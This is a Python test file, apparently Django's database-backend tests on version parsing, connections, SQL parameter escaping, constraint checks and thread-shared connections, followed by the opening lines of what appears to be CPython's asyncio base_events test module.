self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses(
"PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC "
"i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)",
90301
)
def test_nodb_connection(self):
"""
The _nodb_connection property fallbacks to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
warnings.simplefilter('always', RuntimeWarning)
nodb_conn = connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], connection.settings_dict['NAME'])
# Check a RuntimeWarning has been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
new_connection = connection.copy()
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Invalidate timezone name cache, because the setting_changed
# handler cannot know about new_connection.
del new_connection.timezone_name
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
with self.settings(TIME_ZONE=new_tz):
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
new_connection = connection.copy()
new_connection.settings_dict['AUTOCOMMIT'] = False
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
default_level = read_committed if psycopg2.__version__ < '2.7' else None
self.assertEqual(connection.connection.isolation_level, default_level)
new_connection = connection.copy()
new_connection.settings_dict['OPTIONS']['isolation_level'] = serializable
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql.base import psycopg2_version
version_path = 'django.db.backends.postgresql.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') (#12818).
"""
updated = datetime.datetime(2010, 2, 20)
SchoolClass.objects.create(year=2009, last_updated=updated)
years = SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') (#12818).
"""
updated = datetime.datetime(2010, 2, 20)
SchoolClass.objects.create(year=2009, last_updated=updated)
classes = SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
connection.ops.last_executed_query(cursor, '', ())
def test_debug_sql(self):
list(Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
last_executed_query() returns an Unicode string
"""
data = RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# This shouldn't raise an exception (##17158)
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'], query)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_parameter_quoting_on_sqlite(self):
# The implementation of last_executed_queries isn't optimal. It's
# worth testing that parameters are quoted. See #14091.
query = "SELECT %s"
params = ["\"'\\"]
connection.cursor().execute(query, params)
# Note that the single quote is repeated
substituted = "SELECT '\"''\\'"
self.assertEqual(connection.queries[-1]['sql'], substituted)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_large_number_of_parameters_on_sqlite(self):
# If SQLITE_MAX_VARIABLE_NUMBER (default = 999) has been changed to be
# greater than SQLITE_MAX_COLUMN (default = 2000), last_executed_query
# can hit the SQLITE_MAX_COLUMN limit. See #26063.
cursor = connection.cursor()
sql = "SELECT MAX(%s)" % ", ".join(["%s"] * 2001)
params = list(range(2001))
# This should not raise an exception.
cursor.db.ops.last_executed_query(cursor.cursor, sql, params)
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
with self.assertRaises(Exception):
cursor.executemany(query, [(1, 2, 3)])
with self.assertRaises(Exception):
cursor.executemany(query, [(1,)])
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""
An m2m save of a model with a long name and a long m2m field name
doesn't error (#8901).
"""
obj = VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""
Sequence resetting as part of a flush with model with long name and
long pk name doesn't error (#8901).
"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
# response should be an non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 11)
for i in range(-5, 6):
square = Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(Square.objects.count(), 11)
for i in range(-5, 6):
square = Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
Person(first_name="John", last_name="Doe").save()
Person(first_name="Jane", last_name="Doe").save()
Person(first_name="Mary", last_name="Agnelline").save()
Person(first_name="Peter", last_name="Parker").save()
Person(first_name="Clark", last_name="Kent").save()
opts2 = Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
cursor = connection.cursor()
cursor.execute(
'SELECT %s, %s FROM %s ORDER BY %s' % (
qn(f3.column),
qn(f4.column),
connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column),
)
)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
is_usable() doesn't crash when the database disconnects (#21553).
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
self.assertCountEqual(connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
The backend doesn't store an unlimited number of queries (#12581).
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connection = connection.copy()
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(
str(w[0].message),
"Limit for query logging exceeded, only the last 3 queries will be returned."
)
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
def test_timezone_none_use_tz_false(self):
connection.ensure_connection()
with self.settings(TIME_ZONE=None, USE_TZ=False):
connection.init_connection_state()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# verify if its type is django.database.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy Refs #17519
a2 = Article(
headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30,
)
with self.assertRaises(IntegrityError):
a2.save()
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy Refs #17519
# Create another article
r_proxy = ReporterProxy.objects.get(pk=self.r.pk)
Article.objects.create(
headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy,
)
# Retrieve the second article from the DB
a2 = Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
with self.assertRaises(IntegrityError):
a2.save()
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data
without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be
able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
The default connection (i.e. django.db.connection) is different for
each thread (#17258).
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
The connections are different for each thread (#17258).
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
A connection can be passed from one thread to the other (#17258).
"""
Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
A connection that is not explicitly shareable cannot be closed by
another thread (#17258).
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = Object.objects.create()
ref = ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(Object.objects.filter(id=12345).exists())
ref = ObjectReference.objects.create(obj_id=12345)
ref_new = ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = Object.objects.create()
obj.related_objects.create()
self.assertEqual(Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = Object._meta.get_field("related_objects").remote_field.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(SimpleTestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(Object.objects.count(), 2)
|
test_base_events.py
|
"""Tests for base_events.py"""
import concurrent.futures
import errno
import math
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
from test.support import os_helper
from test.support import socket_helper
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def tearDownModule():
asyncio.set_event_loop_policy(None)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
